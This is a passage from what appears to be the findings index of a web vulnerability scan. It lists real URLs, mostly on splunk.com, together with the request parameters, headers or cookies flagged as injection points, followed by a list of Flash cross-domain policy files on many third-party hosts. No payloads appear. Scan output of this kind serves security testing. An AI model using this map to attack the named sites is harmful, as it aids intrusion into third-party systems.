4.388. http://www.splunk.com/cave/narc.php [REST URL parameter 2]

4.389. http://www.splunk.com/company [REST URL parameter 1]

4.390. http://www.splunk.com/company [name of an arbitrarily supplied request parameter]

4.391. http://www.splunk.com/download [REST URL parameter 1]

4.392. http://www.splunk.com/download [_kk parameter]

4.393. http://www.splunk.com/download [_kt parameter]

4.394. http://www.splunk.com/download [ac parameter]

4.395. http://www.splunk.com/download [gclid parameter]

4.396. http://www.splunk.com/download [name of an arbitrarily supplied request parameter]

4.397. http://www.splunk.com/download [r parameter]

4.398. http://www.splunk.com/goto/appbuilding [REST URL parameter 1]

4.399. http://www.splunk.com/goto/appofthemonth [REST URL parameter 1]

4.400. http://www.splunk.com/index.php [REST URL parameter 1]

4.401. http://www.splunk.com/index.php [name of an arbitrarily supplied request parameter]

4.402. http://www.splunk.com/index.php/download_track [REST URL parameter 1]

4.403. http://www.splunk.com/index.php/download_track [REST URL parameter 2]

4.404. http://www.splunk.com/index.php/sso_checker [REST URL parameter 1]

4.405. http://www.splunk.com/index.php/sso_checker [REST URL parameter 2]

4.406. http://www.splunk.com/index.php/sso_checker [return_to parameter]

4.407. http://www.splunk.com/industries [REST URL parameter 1]

4.408. http://www.splunk.com/industries [name of an arbitrarily supplied request parameter]

4.409. http://www.splunk.com/page/all_experts [REST URL parameter 1]

4.410. http://www.splunk.com/page/all_experts [REST URL parameter 2]

4.411. http://www.splunk.com/page/all_experts [name of an arbitrarily supplied request parameter]

4.412. http://www.splunk.com/page/all_experts/partner [REST URL parameter 1]

4.413. http://www.splunk.com/page/all_experts/partner [REST URL parameter 2]

4.414. http://www.splunk.com/page/all_experts/partner [REST URL parameter 3]

4.415. http://www.splunk.com/page/all_experts/partner [name of an arbitrarily supplied request parameter]

4.416. http://www.splunk.com/page/ask_expert [REST URL parameter 1]

4.417. http://www.splunk.com/page/ask_expert [REST URL parameter 2]

4.418. http://www.splunk.com/page/ask_expert [name of an arbitrarily supplied request parameter]

4.419. http://www.splunk.com/page/ask_expert/default/4396 [REST URL parameter 1]

4.420. http://www.splunk.com/page/ask_expert/default/4396 [REST URL parameter 2]

4.421. http://www.splunk.com/page/ask_expert/default/4396 [REST URL parameter 3]

4.422. http://www.splunk.com/page/ask_expert/default/4396 [REST URL parameter 3]

4.423. http://www.splunk.com/page/ask_expert/default/4396 [REST URL parameter 4]

4.424. http://www.splunk.com/page/ask_expert/default/4396 [REST URL parameter 4]

4.425. http://www.splunk.com/page/ask_expert/default/4396 [name of an arbitrarily supplied request parameter]

4.426. http://www.splunk.com/page/ask_expert/default/4396 [name of an arbitrarily supplied request parameter]

4.427. http://www.splunk.com/page/company_news [REST URL parameter 1]

4.428. http://www.splunk.com/page/company_news [REST URL parameter 2]

4.429. http://www.splunk.com/page/company_news [name of an arbitrarily supplied request parameter]

4.430. http://www.splunk.com/page/deployments [REST URL parameter 1]

4.431. http://www.splunk.com/page/deployments [REST URL parameter 2]

4.432. http://www.splunk.com/page/events [REST URL parameter 1]

4.433. http://www.splunk.com/page/events [REST URL parameter 2]

4.434. http://www.splunk.com/page/events [name of an arbitrarily supplied request parameter]

4.435. http://www.splunk.com/page/portal_admin [REST URL parameter 1]

4.436. http://www.splunk.com/page/portal_admin [REST URL parameter 2]

4.437. http://www.splunk.com/page/previous_releases [REST URL parameter 1]

4.438. http://www.splunk.com/page/previous_releases [REST URL parameter 2]

4.439. http://www.splunk.com/page/previous_releases [name of an arbitrarily supplied request parameter]

4.440. http://www.splunk.com/page/release_rss [REST URL parameter 1]

4.441. http://www.splunk.com/page/release_rss [REST URL parameter 2]

4.442. http://www.splunk.com/page/road_map_vote [REST URL parameter 1]

4.443. http://www.splunk.com/page/road_map_vote [REST URL parameter 2]

4.444. http://www.splunk.com/page/road_map_vote [name of an arbitrarily supplied request parameter]

4.445. http://www.splunk.com/page/securelink/signup/Splunk_Company_Overview [REST URL parameter 1]

4.446. http://www.splunk.com/page/securelink/signup/Splunk_Company_Overview [REST URL parameter 2]

4.447. http://www.splunk.com/page/securelink/signup/Splunk_Company_Overview [REST URL parameter 4]

4.448. http://www.splunk.com/page/securelink/signup/Splunk_Executive_Brief [REST URL parameter 1]

4.449. http://www.splunk.com/page/securelink/signup/Splunk_Executive_Brief [REST URL parameter 2]

4.450. http://www.splunk.com/page/securelink/signup/Splunk_Executive_Brief [REST URL parameter 4]

4.451. http://www.splunk.com/page/securelink/signup/Splunk_Product_Datasheet [REST URL parameter 1]

4.452. http://www.splunk.com/page/securelink/signup/Splunk_Product_Datasheet [REST URL parameter 2]

4.453. http://www.splunk.com/page/securelink/signup/Splunk_Product_Datasheet [REST URL parameter 4]

4.454. http://www.splunk.com/page/securelink/signup/Splunk_and_MapReduce [REST URL parameter 1]

4.455. http://www.splunk.com/page/securelink/signup/Splunk_and_MapReduce [REST URL parameter 2]

4.456. http://www.splunk.com/page/securelink/signup/Splunk_and_MapReduce [REST URL parameter 4]

4.457. http://www.splunk.com/page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence [REST URL parameter 1]

4.458. http://www.splunk.com/page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence [REST URL parameter 2]

4.459. http://www.splunk.com/page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence [REST URL parameter 4]

4.460. http://www.splunk.com/page/securityportal [REST URL parameter 1]

4.461. http://www.splunk.com/page/securityportal [REST URL parameter 2]

4.462. http://www.splunk.com/page/securityportal [name of an arbitrarily supplied request parameter]

4.463. http://www.splunk.com/page/sign_up [REST URL parameter 1]

4.464. http://www.splunk.com/page/sign_up [REST URL parameter 2]

4.465. http://www.splunk.com/page/sign_up [name of an arbitrarily supplied request parameter]

4.466. http://www.splunk.com/page/submit_issue [REST URL parameter 1]

4.467. http://www.splunk.com/page/submit_issue [REST URL parameter 2]

4.468. http://www.splunk.com/page/track_issues [REST URL parameter 1]

4.469. http://www.splunk.com/page/track_issues [REST URL parameter 2]

4.470. http://www.splunk.com/partners [REST URL parameter 1]

4.471. http://www.splunk.com/partners [name of an arbitrarily supplied request parameter]

4.472. http://www.splunk.com/product [REST URL parameter 1]

4.473. http://www.splunk.com/product [name of an arbitrarily supplied request parameter]

4.474. http://www.splunk.com/search/docs [REST URL parameter 1]

4.475. http://www.splunk.com/search/docs [REST URL parameter 2]

4.476. http://www.splunk.com/search/docs [REST URL parameter 2]

4.477. http://www.splunk.com/search/docs [name of an arbitrarily supplied request parameter]

4.478. http://www.splunk.com/search/docs [name of an arbitrarily supplied request parameter]

4.479. http://www.splunk.com/services [REST URL parameter 1]

4.480. http://www.splunk.com/services [name of an arbitrarily supplied request parameter]

4.481. http://www.splunk.com/solutions [REST URL parameter 1]

4.482. http://www.splunk.com/solutions [name of an arbitrarily supplied request parameter]

4.483. http://www.splunk.com/support [REST URL parameter 1]

4.484. http://www.splunk.com/support [name of an arbitrarily supplied request parameter]

4.485. http://www.splunk.com/themes/splunk_com/css/slimbox/slimbox2.css [REST URL parameter 1]

4.486. http://www.splunk.com/themes/splunk_com/css/slimbox/slimbox2.css [REST URL parameter 2]

4.487. http://www.splunk.com/themes/splunk_com/css/slimbox/slimbox2.css [REST URL parameter 3]

4.488. http://www.splunk.com/themes/splunk_com/css/slimbox/slimbox2.css [REST URL parameter 4]

4.489. http://www.splunk.com/themes/splunk_com/css/slimbox/slimbox2.css [REST URL parameter 5]

4.490. http://www.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 1]

4.491. http://www.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 2]

4.492. http://www.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 3]

4.493. http://www.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 4]

4.494. http://www.splunk.com/videos [REST URL parameter 1]

4.495. http://www.splunk.com/videos [name of an arbitrarily supplied request parameter]

4.496. http://www.splunk.com/videos [r parameter]

4.497. http://www.splunk.com/view/ [REST URL parameter 1]

4.498. http://www.splunk.com/view/ [name of an arbitrarily supplied request parameter]

4.499. http://www.splunk.com/view/SP-CAAAAAG [REST URL parameter 1]

4.500. http://www.splunk.com/view/SP-CAAAAAG [REST URL parameter 2]

4.501. http://www.splunk.com/view/SP-CAAAAAG [name of an arbitrarily supplied request parameter]

4.502. http://www.splunk.com/view/SP-CAAAAAH [REST URL parameter 1]

4.503. http://www.splunk.com/view/SP-CAAAAAH [REST URL parameter 2]

4.504. http://www.splunk.com/view/SP-CAAAAAH [name of an arbitrarily supplied request parameter]

4.505. http://www.splunk.com/view/SP-CAAAAH7 [REST URL parameter 1]

4.506. http://www.splunk.com/view/SP-CAAAAH7 [REST URL parameter 2]

4.507. http://www.splunk.com/view/SP-CAAAAH7 [name of an arbitrarily supplied request parameter]

4.508. http://www.splunk.com/view/SP-CAAAFVN [REST URL parameter 1]

4.509. http://www.splunk.com/view/SP-CAAAFVN [REST URL parameter 2]

4.510. http://www.splunk.com/view/SP-CAAAFVN [name of an arbitrarily supplied request parameter]

4.511. http://www.splunk.com/view/about-us/SP-CAAAAH8 [REST URL parameter 1]

4.512. http://www.splunk.com/view/about-us/SP-CAAAAH8 [REST URL parameter 2]

4.513. http://www.splunk.com/view/about-us/SP-CAAAAH8 [REST URL parameter 3]

4.514. http://www.splunk.com/view/about-us/SP-CAAAAH8 [name of an arbitrarily supplied request parameter]

4.515. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC [REST URL parameter 1]

4.516. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC [REST URL parameter 2]

4.517. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC [REST URL parameter 3]

4.518. http://www.splunk.com/view/application-management-solutions/SP-CAAADSC [name of an arbitrarily supplied request parameter]

4.519. http://www.splunk.com/view/awards/SP-CAAADTE [REST URL parameter 1]

4.520. http://www.splunk.com/view/awards/SP-CAAADTE [REST URL parameter 2]

4.521. http://www.splunk.com/view/awards/SP-CAAADTE [REST URL parameter 3]

4.522. http://www.splunk.com/view/awards/SP-CAAADTE [name of an arbitrarily supplied request parameter]

4.523. http://www.splunk.com/view/benefits/SP-CAAACCS [REST URL parameter 1]

4.524. http://www.splunk.com/view/benefits/SP-CAAACCS [REST URL parameter 2]

4.525. http://www.splunk.com/view/benefits/SP-CAAACCS [REST URL parameter 3]

4.526. http://www.splunk.com/view/benefits/SP-CAAACCS [name of an arbitrarily supplied request parameter]

4.527. http://www.splunk.com/view/business-analytics/SP-CAAAFXH [REST URL parameter 1]

4.528. http://www.splunk.com/view/business-analytics/SP-CAAAFXH [REST URL parameter 2]

4.529. http://www.splunk.com/view/business-analytics/SP-CAAAFXH [REST URL parameter 3]

4.530. http://www.splunk.com/view/business-analytics/SP-CAAAFXH [name of an arbitrarily supplied request parameter]

4.531. http://www.splunk.com/view/careers/SP-CAAAAGG [REST URL parameter 1]

4.532. http://www.splunk.com/view/careers/SP-CAAAAGG [REST URL parameter 2]

4.533. http://www.splunk.com/view/careers/SP-CAAAAGG [REST URL parameter 3]

4.534. http://www.splunk.com/view/careers/SP-CAAAAGG [name of an arbitrarily supplied request parameter]

4.535. http://www.splunk.com/view/cloud-and-managed-service-providers/SP-CAAACP7 [REST URL parameter 1]

4.536. http://www.splunk.com/view/cloud-and-managed-service-providers/SP-CAAACP7 [REST URL parameter 2]

4.537. http://www.splunk.com/view/cloud-and-managed-service-providers/SP-CAAACP7 [REST URL parameter 3]

4.538. http://www.splunk.com/view/cloud-and-managed-service-providers/SP-CAAACP7 [name of an arbitrarily supplied request parameter]

4.539. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [REST URL parameter 1]

4.540. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [REST URL parameter 2]

4.541. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [REST URL parameter 3]

4.542. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [name of an arbitrarily supplied request parameter]

4.543. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [r parameter]

4.544. http://www.splunk.com/view/customer-case-studies/SP-CAAABB2 [REST URL parameter 1]

4.545. http://www.splunk.com/view/customer-case-studies/SP-CAAABB2 [REST URL parameter 2]

4.546. http://www.splunk.com/view/customer-case-studies/SP-CAAABB2 [REST URL parameter 3]

4.547. http://www.splunk.com/view/customer-case-studies/SP-CAAABB2 [name of an arbitrarily supplied request parameter]

4.548. http://www.splunk.com/view/developers/SP-CAAAFR3 [REST URL parameter 1]

4.549. http://www.splunk.com/view/developers/SP-CAAAFR3 [REST URL parameter 2]

4.550. http://www.splunk.com/view/developers/SP-CAAAFR3 [REST URL parameter 3]

4.551. http://www.splunk.com/view/developers/SP-CAAAFR3 [name of an arbitrarily supplied request parameter]

4.552. http://www.splunk.com/view/education/SP-CAAAAH9 [REST URL parameter 1]

4.553. http://www.splunk.com/view/education/SP-CAAAAH9 [REST URL parameter 2]

4.554. http://www.splunk.com/view/education/SP-CAAAAH9 [REST URL parameter 3]

4.555. http://www.splunk.com/view/education/SP-CAAAAH9 [name of an arbitrarily supplied request parameter]

4.556. http://www.splunk.com/view/free-vs-enterprise/SP-CAAAE8W [REST URL parameter 1]

4.557. http://www.splunk.com/view/free-vs-enterprise/SP-CAAAE8W [REST URL parameter 2]

4.558. http://www.splunk.com/view/free-vs-enterprise/SP-CAAAE8W [REST URL parameter 3]

4.559. http://www.splunk.com/view/free-vs-enterprise/SP-CAAAE8W [name of an arbitrarily supplied request parameter]

4.560. http://www.splunk.com/view/government/SP-CAAADSN [REST URL parameter 1]

4.561. http://www.splunk.com/view/government/SP-CAAADSN [REST URL parameter 2]

4.562. http://www.splunk.com/view/government/SP-CAAADSN [REST URL parameter 3]

4.563. http://www.splunk.com/view/government/SP-CAAADSN [name of an arbitrarily supplied request parameter]

4.564. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA [REST URL parameter 1]

4.565. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA [REST URL parameter 2]

4.566. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA [REST URL parameter 3]

4.567. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA [name of an arbitrarily supplied request parameter]

4.568. http://www.splunk.com/view/long-tail/SP-CAAAE7F [REST URL parameter 1]

4.569. http://www.splunk.com/view/long-tail/SP-CAAAE7F [REST URL parameter 2]

4.570. http://www.splunk.com/view/long-tail/SP-CAAAE7F [REST URL parameter 3]

4.571. http://www.splunk.com/view/long-tail/SP-CAAAE7F [name of an arbitrarily supplied request parameter]

4.572. http://www.splunk.com/view/operational-intelligence/SP-CAAAFVM [REST URL parameter 1]

4.573. http://www.splunk.com/view/operational-intelligence/SP-CAAAFVM [REST URL parameter 2]

4.574. http://www.splunk.com/view/operational-intelligence/SP-CAAAFVM [REST URL parameter 3]

4.575. http://www.splunk.com/view/operational-intelligence/SP-CAAAFVM [name of an arbitrarily supplied request parameter]

4.576. http://www.splunk.com/view/partner-directory/SP-CAAABCY [REST URL parameter 1]

4.577. http://www.splunk.com/view/partner-directory/SP-CAAABCY [REST URL parameter 2]

4.578. http://www.splunk.com/view/partner-directory/SP-CAAABCY [REST URL parameter 3]

4.579. http://www.splunk.com/view/partner-directory/SP-CAAABCY [name of an arbitrarily supplied request parameter]

4.580. http://www.splunk.com/view/partner-programs/SP-CAAACED [REST URL parameter 1]

4.581. http://www.splunk.com/view/partner-programs/SP-CAAACED [REST URL parameter 2]

4.582. http://www.splunk.com/view/partner-programs/SP-CAAACED [REST URL parameter 3]

4.583. http://www.splunk.com/view/partner-programs/SP-CAAACED [name of an arbitrarily supplied request parameter]

4.584. http://www.splunk.com/view/product-tour/SP-CAAAAGV [REST URL parameter 1]

4.585. http://www.splunk.com/view/product-tour/SP-CAAAAGV [REST URL parameter 2]

4.586. http://www.splunk.com/view/product-tour/SP-CAAAAGV [REST URL parameter 3]

4.587. http://www.splunk.com/view/product-tour/SP-CAAAAGV [name of an arbitrarily supplied request parameter]

4.588. http://www.splunk.com/view/professional-services/SP-CAAABH9 [REST URL parameter 1]

4.589. http://www.splunk.com/view/professional-services/SP-CAAABH9 [REST URL parameter 2]

4.590. http://www.splunk.com/view/professional-services/SP-CAAABH9 [REST URL parameter 3]

4.591. http://www.splunk.com/view/professional-services/SP-CAAABH9 [name of an arbitrarily supplied request parameter]

4.592. http://www.splunk.com/view/resources/SP-CAAACGF [REST URL parameter 1]

4.593. http://www.splunk.com/view/resources/SP-CAAACGF [REST URL parameter 2]

4.594. http://www.splunk.com/view/resources/SP-CAAACGF [REST URL parameter 3]

4.595. http://www.splunk.com/view/resources/SP-CAAACGF [name of an arbitrarily supplied request parameter]

4.596. http://www.splunk.com/view/security-and-compliance-solutions/SP-CAAADSB [REST URL parameter 1]

4.597. http://www.splunk.com/view/security-and-compliance-solutions/SP-CAAADSB [REST URL parameter 2]

4.598. http://www.splunk.com/view/security-and-compliance-solutions/SP-CAAADSB [REST URL parameter 3]

4.599. http://www.splunk.com/view/security-and-compliance-solutions/SP-CAAADSB [name of an arbitrarily supplied request parameter]

4.600. http://www.splunk.com/view/services/SP-CAAAFQJ [REST URL parameter 1]

4.601. http://www.splunk.com/view/services/SP-CAAAFQJ [REST URL parameter 2]

4.602. http://www.splunk.com/view/services/SP-CAAAFQJ [REST URL parameter 3]

4.603. http://www.splunk.com/view/services/SP-CAAAFQJ [name of an arbitrarily supplied request parameter]

4.604. http://www.splunk.com/view/splunk-at-whitepages/SP-CAAAFUY [REST URL parameter 1]

4.605. http://www.splunk.com/view/splunk-at-whitepages/SP-CAAAFUY [REST URL parameter 2]

4.606. http://www.splunk.com/view/splunk-at-whitepages/SP-CAAAFUY [REST URL parameter 3]

4.607. http://www.splunk.com/view/splunk-at-whitepages/SP-CAAAFUY [name of an arbitrarily supplied request parameter]

4.608. http://www.splunk.com/view/support-documents/SP-CAAAAD4 [REST URL parameter 1]

4.609. http://www.splunk.com/view/support-documents/SP-CAAAAD4 [REST URL parameter 2]

4.610. http://www.splunk.com/view/support-documents/SP-CAAAAD4 [REST URL parameter 3]

4.611. http://www.splunk.com/view/support-documents/SP-CAAAAD4 [name of an arbitrarily supplied request parameter]

4.612. http://www.splunk.com/view/support-programs/SP-CAAACC8 [REST URL parameter 1]

4.613. http://www.splunk.com/view/support-programs/SP-CAAACC8 [REST URL parameter 2]

4.614. http://www.splunk.com/view/support-programs/SP-CAAACC8 [REST URL parameter 3]

4.615. http://www.splunk.com/view/support-programs/SP-CAAACC8 [name of an arbitrarily supplied request parameter]

4.616. http://www.splunk.com/view/support/SP-CAAAAFV [REST URL parameter 1]

4.617. http://www.splunk.com/view/support/SP-CAAAAFV [REST URL parameter 2]

4.618. http://www.splunk.com/view/support/SP-CAAAAFV [REST URL parameter 3]

4.619. http://www.splunk.com/view/support/SP-CAAAAFV [name of an arbitrarily supplied request parameter]

4.620. http://www.splunk.com/view/what-is-it-data/SP-CAAACDC [REST URL parameter 1]

4.621. http://www.splunk.com/view/what-is-it-data/SP-CAAACDC [REST URL parameter 2]

4.622. http://www.splunk.com/view/what-is-it-data/SP-CAAACDC [REST URL parameter 3]

4.623. http://www.splunk.com/view/what-is-it-data/SP-CAAACDC [name of an arbitrarily supplied request parameter]

4.624. http://www.splunk.com/view/whats-new/SP-CAAAFD2 [REST URL parameter 1]

4.625. http://www.splunk.com/view/whats-new/SP-CAAAFD2 [REST URL parameter 2]

4.626. http://www.splunk.com/view/whats-new/SP-CAAAFD2 [REST URL parameter 3]

4.627. http://www.splunk.com/view/whats-new/SP-CAAAFD2 [name of an arbitrarily supplied request parameter]

4.628. http://www.splunk.com/wiki [REST URL parameter 1]

4.629. http://www.splunk.com/wiki [REST URL parameter 1]

4.630. http://www.splunk.com/wiki [name of an arbitrarily supplied request parameter]

4.631. http://www.splunk.com/wiki/ [REST URL parameter 1]

4.632. http://www.splunk.com/wiki/ [REST URL parameter 1]

4.633. http://www.splunk.com/wiki/ [name of an arbitrarily supplied request parameter]

4.634. http://www.vibrantmedia.com/whatisIntelliTXT.asp [ipid parameter]

4.635. http://www.yasni.de/ [name of an arbitrarily supplied request parameter]

4.636. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]

4.637. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

4.638. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]

4.639. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

4.640. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [source parameter]

4.641. http://www201.americanexpress.com/getthecard/home [sj_tabToOpen parameter]

4.642. http://zh-hans.splunk.com/ [name of an arbitrarily supplied request parameter]

4.643. http://zh-hans.splunk.com/cave/narc.php [REST URL parameter 1]

4.644. http://zh-hans.splunk.com/cave/narc.php [REST URL parameter 2]

4.645. http://zh-hans.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 1]

4.646. http://zh-hans.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 2]

4.647. http://zh-hans.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 3]

4.648. http://zh-hans.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 4]

4.649. http://zh-hant.splunk.com/ [name of an arbitrarily supplied request parameter]

4.650. http://zh-hant.splunk.com/cave/narc.php [REST URL parameter 1]

4.651. http://zh-hant.splunk.com/cave/narc.php [REST URL parameter 2]

4.652. http://zh-hant.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 1]

4.653. http://zh-hant.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 2]

4.654. http://zh-hant.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 3]

4.655. http://zh-hant.splunk.com/themes/splunk_com/css/v5.php [REST URL parameter 4]

4.656. http://appdeveloper.intel.com/en-us/challenge [Referer HTTP header]

4.657. http://appdeveloper.intel.com/en-us/join [Referer HTTP header]

4.658. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.659. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.660. http://www.arto.com/ [User-Agent HTTP header]

4.661. http://www.au2m8.com/v/ [Referer HTTP header]

4.662. http://www.au2m8.com/v/index.php [Referer HTTP header]

4.663. http://www.baselinemag.com/ [Referer HTTP header]

4.664. http://www.baselinemag.com/blank.gif [Referer HTTP header]

4.665. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ [Referer HTTP header]

4.666. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/&hl=en&client=ca-pub-6422417422167576&adU=www.RiminiStreet.com&adT=ImageAd&gl=US&usg=AFQjCNH5RnMJStR1tz53GbCMllXhLJ0M_g/ [Referer HTTP header]

4.667. http://www.baselinemag.com/googlecse.html [Referer HTTP header]

4.668. http://www.baselinemag.com/images/marketplace-hdr-bg.gif [Referer HTTP header]

4.669. http://www.baselinemag.com/images/marketplace-hdr.gif [Referer HTTP header]

4.670. http://www.baselinemag.com/spacer.gif [Referer HTTP header]

4.671. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Smarter-Enterprise-and-NextGeneration-Web-Services/ [Referer HTTP header]

4.672. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ [Referer HTTP header]

4.673. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-Jan-20-2010/ [Referer HTTP header]

4.674. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ [Referer HTTP header]

4.675. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/eWeek-Newsbreak-July-24-2009/ [Referer HTTP header]

4.676. http://www.eweek.com/c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ [Referer HTTP header]

4.677. http://www.eweek.com/c/a/Windows/5-Reasons-Companies-Arent-Skipping-Vista/ [Referer HTTP header]

4.678. http://www.eweek.com/c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ [Referer HTTP header]

4.679. http://www.eweek.com/c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ [Referer HTTP header]

4.680. http://www.eweek.com/c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ [Referer HTTP header]

4.681. http://www.eweek.com/c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ [Referer HTTP header]

4.682. http://www.eweek.com/c/s/Videos/ [Referer HTTP header]

4.683. http://www.eweek.com/c/s/Videos/ [Referer HTTP header]

4.684. http://www.kledy.de/modules/buttons/buttons.php [Referer HTTP header]

4.685. http://www.protopage.com/ [Referer HTTP header]

4.686. http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

4.687. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

4.688. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp [Referer HTTP header]

4.689. https://www.slackinc.com/subscribe/newsubs/otistep1.asp [Referer HTTP header]

4.690. http://www.splunk.com/index.php/sso_checker [Referer HTTP header]

4.691. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.692. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

4.693. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

4.694. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

4.695. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

4.696. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

4.697. http://c03.adsummos.net/a/e/r21719 [adsud cookie]

4.698. http://www.download32.com/go/55498/http:/resolve.iscool.net/ [REST URL parameter 2]

4.699. http://www.download32.com/go/55498/http:/resolve.iscool.net/ [REST URL parameter 3]

4.700. http://www.rackspace.com/apps/email_hosting/exchange_hosting/ [IS_UASrackuid cookie]

5. Flash cross-domain policy

5.1. http://ad-emea.doubleclick.net/crossdomain.xml

5.2. http://ad.de.doubleclick.net/crossdomain.xml

5.3. http://ad.doubleclick.net/crossdomain.xml

5.4. http://ad.zanox.com/crossdomain.xml

5.5. http://api.bit.ly/crossdomain.xml

5.6. http://ar.voicefive.com/crossdomain.xml

5.7. http://au2m8.com/crossdomain.xml

5.8. http://b.voicefive.com/crossdomain.xml

5.9. http://blog.vibrantmedia.com/crossdomain.xml

5.10. http://bs.serving-sys.com/crossdomain.xml

5.11. http://cdn.manualsonline.com/crossdomain.xml

5.12. http://cdn.royale.spongecell.com/crossdomain.xml

5.13. http://cdn.w55c.net/crossdomain.xml

5.14. http://cdn.widgets.spongecell.com/crossdomain.xml

5.15. http://clk.redcated/crossdomain.xml

5.16. http://demos.us.intellitxt.com/crossdomain.xml

5.17. http://ds.serving-sys.com/crossdomain.xml

5.18. http://eisenstein.dk/crossdomain.xml

5.19. http://enterprisemediagroup.112.2o7.net/crossdomain.xml

5.20. http://external.ak.fbcdn.net/crossdomain.xml

5.21. http://feeds.feedburner.com/crossdomain.xml

5.22. http://files.video-loader.com/crossdomain.xml

5.23. http://metrics.blackberry.com/crossdomain.xml

5.24. http://metrixlablw.customers.luna.net/crossdomain.xml

5.25. http://mittwiki.ivwbox.de/crossdomain.xml

5.26. http://ping.fm/crossdomain.xml

5.27. http://platform.ak.fbcdn.net/crossdomain.xml

5.28. http://rt32.infolinks.com/crossdomain.xml

5.29. http://rt82.infolinks.com/crossdomain.xml

5.30. http://rt83.infolinks.com/crossdomain.xml

5.31. http://s.ytimg.com/crossdomain.xml

5.32. http://s3.amazonaws.com/crossdomain.xml

5.33. http://spe.redcated/crossdomain.xml

5.34. http://spongecell.com/crossdomain.xml

5.35. http://us.blackberry.com/crossdomain.xml

5.36. http://videos.video-loader.com/crossdomain.xml

5.37. http://vodpod.com/crossdomain.xml

5.38. http://www.ad4mat.de/crossdomain.xml

5.39. http://www.allvoices.com/crossdomain.xml

5.40. http://www.au2m8.com/crossdomain.xml

5.41. http://www.baselinemag.com/crossdomain.xml

5.42. http://www.hemidemi.com/crossdomain.xml

5.43. http://www.manualsonline.com/crossdomain.xml

5.44. http://www.zanox-affiliate.de/crossdomain.xml

5.45. http://www91.intel.com/crossdomain.xml

5.46. http://yasnide.ivwbox.de/crossdomain.xml

5.47. http://ziffdavisbaseline.112.2o7.net/crossdomain.xml

5.48. http://a.ligatus.com/crossdomain.xml

5.49. http://a.ligatus.de/crossdomain.xml

5.50. http://api.tweetmeme.com/crossdomain.xml

5.51. http://appcdn.wibiya.com/crossdomain.xml

5.52. http://b.static.ak.fbcdn.net/crossdomain.xml

5.53. http://chitika.com/crossdomain.xml

5.54. http://current.com/crossdomain.xml

5.55. http://d.ligatus.com/crossdomain.xml

5.56. http://developers.facebook.com/crossdomain.xml

5.57. http://friendfeed.com/crossdomain.xml

5.58. http://geo.yahoo.com/crossdomain.xml

5.59. http://googleads.g.doubleclick.net/crossdomain.xml

5.60. http://messenger.yahoo.com/crossdomain.xml

5.61. http://multiply.com/crossdomain.xml

5.62. http://officedepot.shoplocal.com/crossdomain.xml

5.63. http://posterous.com/crossdomain.xml

5.64. http://static.ak.fbcdn.net/crossdomain.xml

5.65. http://www.amazon.com/crossdomain.xml

5.66. http://www.arto.com/crossdomain.xml

5.67. http://www.bebo.com/crossdomain.xml

5.68. https://www.box.net/crossdomain.xml

5.69. http://www.dzone.com/crossdomain.xml

5.70. http://www.hyves.nl/crossdomain.xml

5.71. http://www.myspace.com/crossdomain.xml

5.72. http://www.netlog.com/crossdomain.xml

5.73. http://www.netvibes.com/crossdomain.xml

5.74. http://www.newsvine.com/crossdomain.xml

5.75. http://www.nowpublic.com/crossdomain.xml

5.76. http://www.orkut.com/crossdomain.xml

5.77. http://www.vodafone.de/crossdomain.xml

5.78. http://faves.com/crossdomain.xml

